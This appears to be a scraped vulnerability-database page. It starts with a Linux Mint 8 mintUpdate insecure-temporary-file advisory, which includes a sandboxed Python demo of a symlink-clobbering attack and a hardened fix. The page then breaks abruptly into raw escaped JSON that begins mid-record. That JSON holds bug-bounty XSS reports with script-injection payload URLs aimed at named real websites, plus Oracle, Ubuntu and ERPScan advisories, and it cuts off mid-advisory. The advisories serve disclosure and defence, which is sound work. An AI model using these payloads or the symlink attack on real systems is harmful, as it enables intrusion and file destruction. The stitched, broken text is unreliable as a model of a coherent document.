Linux Mint 8 mintUpdate Insecure Temporary File Creation
2010-05-21T00:00:00
ID SECURITYVULNS:DOC:23897 Type securityvulns Reporter Securityvulns Modified 2010-05-21T00:00:00
Description
======================================================================
Linux Mint 8 mintUpdate Insecure Temporary File Creation
======================================================================
Author: L4teral <l4teral [at] gmail com>
Impact: Privilege Escalation
Status: Update available
Affected software description:
Application: mintUpdate (Linux Mint)
Version: Linux Mint 8
Vendor: http://linuxmint.com
Description:
Linux Mint's purpose is to produce an elegant, up-to-date and
comfortable GNU/Linux desktop distribution.
Vulnerability:
The Linux Mint update tool mintUpdate writes its log to a fixed,
predictable path inside /tmp/mintUpdate/. /tmp is shared by every local
user, and the tool does not refuse a pre-existing entry or symbolic
link at that path before opening it, so the open follows a link planted
there by another user. Because mintUpdate does this after elevating to
root via sudo, any local user can make it overwrite a file that only
root may write. Note that the link sits in /tmp/mintUpdate/, a directory
the attacker can create and own, rather than directly in the sticky
/tmp, so the later kernel fs.protected_symlinks restriction would not
stop this variant on its own; the fix has to be in the application.
PoC/Exploit:
The symlinks must be in place before the user clicks the mintUpdate
icon: the attacker creates /tmp/mintUpdate/ and links the expected log
file name to the file to be destroyed. When the user authenticates to
sudo, the tool, now running as root, opens its log through the link and
truncates the target, replacing its contents with log data. As
described, the attacker chooses the destination but not what is
written, so the demonstrated effect is destruction of arbitrary files
(crucial system files included); an ordinary local account is all that
is needed.
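The attack described above, and the pattern a maintainer would replace it with, as an added example that is not part of the original advisory or of mintUpdate's own code. It is written in Python (mintUpdate is a Python application) and runs entirely inside a throw-away directory that stands in for /tmp, so it needs no root and touches no real system file. The directory name mintUpdate comes from the advisory; the log file name mintUpdate.log and the victim file are assumptions made for the demonstration.

```python
import errno
import os
import stat
import tempfile

# The directory name comes from the advisory; the log file name is an
# assumption for illustration (the advisory only says "log data" is written).
LOG_DIR_NAME = "mintUpdate"
LOG_FILE_NAME = "mintUpdate.log"


def plant_symlink(shared_tmp, victim_path):
    """Attacker's preparation, done as an ordinary user before the victim
    clicks the icon: create the predictable directory and point the
    predictable log name at a file the attacker cannot write."""
    log_dir = os.path.join(shared_tmp, LOG_DIR_NAME)
    os.makedirs(log_dir, exist_ok=True)
    link = os.path.join(log_dir, LOG_FILE_NAME)
    os.symlink(victim_path, link)
    return link


def vulnerable_write_log(shared_tmp, data):
    """The insecure pattern: a fixed path in a shared directory opened with
    plain open(..., "w"). open() follows the symlink and truncates its
    target, so the victim file ends up containing log data."""
    log_dir = os.path.join(shared_tmp, LOG_DIR_NAME)
    os.makedirs(log_dir, exist_ok=True)
    log_path = os.path.join(log_dir, LOG_FILE_NAME)
    with open(log_path, "w") as fh:
        fh.write(data)
    return log_path


def open_new_nofollow(path):
    """Create `path` as a brand-new regular file or fail. O_EXCL makes the
    call fail with EEXIST if anything (a symlink included, even a dangling
    one) already exists there; O_NOFOLLOW refuses to traverse a symlink at
    the final component (ELOOP)."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    return os.fdopen(os.open(path, flags, 0o600), "w")


def hardened_write_log(shared_tmp, data):
    """Hardened pattern: a private directory with an unpredictable name and
    mode 0700 (tempfile.mkdtemp), and the log created inside it with
    open_new_nofollow(). Nothing the attacker planted is ever opened."""
    private_dir = tempfile.mkdtemp(prefix=LOG_DIR_NAME + "-", dir=shared_tmp)
    log_path = os.path.join(private_dir, LOG_FILE_NAME)
    with open_new_nofollow(log_path) as fh:
        fh.write(data)
    return log_path


def demo():
    """Run both writers against a planted symlink inside a throw-away
    directory standing in for /tmp. Returns what happened to the victim."""
    shared_tmp = tempfile.mkdtemp(prefix="fake-tmp-")
    victim = os.path.join(shared_tmp, "victim.conf")  # stands in for a root-owned file
    with open(victim, "w") as fh:
        fh.write("original contents\n")
    plant_symlink(shared_tmp, victim)

    vulnerable_write_log(shared_tmp, "log data\n")
    with open(victim) as fh:
        after_vulnerable = fh.read()

    with open(victim, "w") as fh:  # restore the victim for the second run
        fh.write("original contents\n")

    # The planted link is still there; an exclusive, no-follow open refuses it.
    try:
        fh = open_new_nofollow(os.path.join(shared_tmp, LOG_DIR_NAME, LOG_FILE_NAME))
        fh.close()
        refused = False
    except OSError as exc:
        refused = exc.errno in (errno.EEXIST, errno.ELOOP)

    log_path = hardened_write_log(shared_tmp, "log data\n")
    with open(victim) as fh:
        after_hardened = fh.read()
    private_dir_mode = stat.S_IMODE(os.stat(os.path.dirname(log_path)).st_mode)
    return {
        "after_vulnerable": after_vulnerable,
        "refused": refused,
        "after_hardened": after_hardened,
        "private_dir_mode": private_dir_mode,
        "log_is_symlink": os.path.islink(log_path),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running the script shows the victim file replaced by "log data" after the vulnerable writer, untouched after the hardened one, and the exclusive no-follow open rejecting the planted link. The private-directory approach is the one to prefer for a tool that runs as root: a root process should not be writing to paths under a shared /tmp that an unprivileged user can pre-create at all, and where a fixed location is unavoidable the O_EXCL|O_NOFOLLOW open plus a check that the parent directory is owned by the process's own uid and not writable by others is the minimum.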
Solution:
Update to Linux Mint 9
or apply the following patch:
http://github.com/linuxmint/mintupdate/commit/301993906c694eb119cd9614817de57e7b0c874c
Timeline:
2010-03-08 - vendor informed
2010-03-17 - vendor response, patched in source repository
2010-05-18 - Linux Mint 9 released, public disclosure
Source: https://vulners.com/securityvulns/SECURITYVULNS:DOC:23897
No CVE identifier and no CVSS score were assigned to this advisory.
https://vacatures.centrumvoorwerk.nl/display-job/23897/Business-Controller.html?searchId=%22%27--!%3E%3C/Title/%3C/Style/%3C/Script/%3C/c/%3C/Noscript/%3C/Pre/%3C/Xmp%3E%3CBody/OnPageShow=confirm(/OPENBUGBOUNTY/)%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| Unknown / Not calculated \nVIP website status:| No \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 11 November, 2017 21:24 GMT \nGeneric security notifications sent to website owner| 11 November, 2017 21:27 GMT \nVulnerability details disclosed by researcher| 20 December, 2017 16:20 GMT \nVulnerability patched by the website owner| 21 December, 2017 08:35 GMT\n", "modified": "2017-12-21T08:35:00", "published": "2017-11-11T21:24:00", "href": "https://www.openbugbounty.org/reports/410608/", "id": "OBB:410608", "type": "openbugbounty", "title": "vacatures.centrumvoorwerk.nl XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-14T23:23:17", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Vulnerable URL:\n \n \n https://www.zonebourse.com/AIRBUS-SE-4637/x%22%3E%3CsvG%20onLoad=prompt(9)%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Verification in progress \nLatest check for patch:| 14.01.2018 \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 23897 \nVIP website status:| Yes \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 15 October, 2017 23:48 GMT \nVulnerability existence verified and confirmed| 16 October, 2017 05:32 GMT \nGeneric security notifications sent to website owner| 16 October, 2017 05:32 GMT \nNotification sent to subscribers (without technical details)| 16 October, 2017 06:17 GMT \nVulnerability details disclosed by researcher| 14 
January, 2018 05:35 GMT\n", "modified": "2018-01-14T05:35:00", "published": "2017-10-15T23:48:00", "href": "https://www.openbugbounty.org/reports/339460/", "id": "OBB:339460", "title": "zonebourse.com XSS vulnerability ", "type": "openbugbounty", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-10-18T17:41:12", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Vulnerable URL:\n \n \n http://www.tdrzd.ru/search/?rid=23897&textSearch;=%22%3E%3Csvg%2Fonload%3Dprompt%28/XSSPOSED/%29%3E&x;=0&y;=0\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| No \nLatest check for patch:| 25.07.2017 \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 4880872 \nGoogle Pagerank| 4 \nVIP website status:| No \nCheck tdrzd.ru SSL connection:| (Grade: F) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability reported| 4 November, 2015 21:31 GMT \nVulnerability existence verified and confirmed| 4 November, 2015 21:33 GMT\n", "modified": "2015-11-04T21:33:00", "published": "2015-11-04T21:31:00", "href": "https://www.openbugbounty.org/reports/100973/", "id": "OBB:100973", "type": "openbugbounty", "title": "tdrzd.ru XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of 
Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. 
Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important 
to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for 
debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", 
"CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 
vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. 
(CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], 
"description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. 
REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. 
Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. 
